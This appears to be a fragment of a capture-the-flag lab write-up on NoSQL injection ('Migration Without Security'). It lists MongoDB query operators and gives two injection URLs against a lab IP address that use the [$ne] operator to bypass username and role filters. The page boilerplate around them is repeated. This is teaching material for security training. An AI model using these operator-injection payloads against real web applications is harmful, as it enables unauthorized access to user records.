[Day 7] Migration Without Security
{Web Exploitation = NoSQLi}








Last updated
Was this helpful?
{Web Exploitation = NoSQLi}








Last updated
Was this helpful?
Was this helpful?
$eq - matches records that equal to a certain value
$ne - matches records that are not equal to a certain value
$gt - matches records that are greater than a certain value.
$where - matches records based on Javascript condition
$exists - matches records that have a certain field
$regex - matches records that satisfy certain regular expressions.10.10.121.120/search?username[$ne]=admin&role=guesthttp://10.10.121.120/search?username=mcskidy&role[$ne]=guest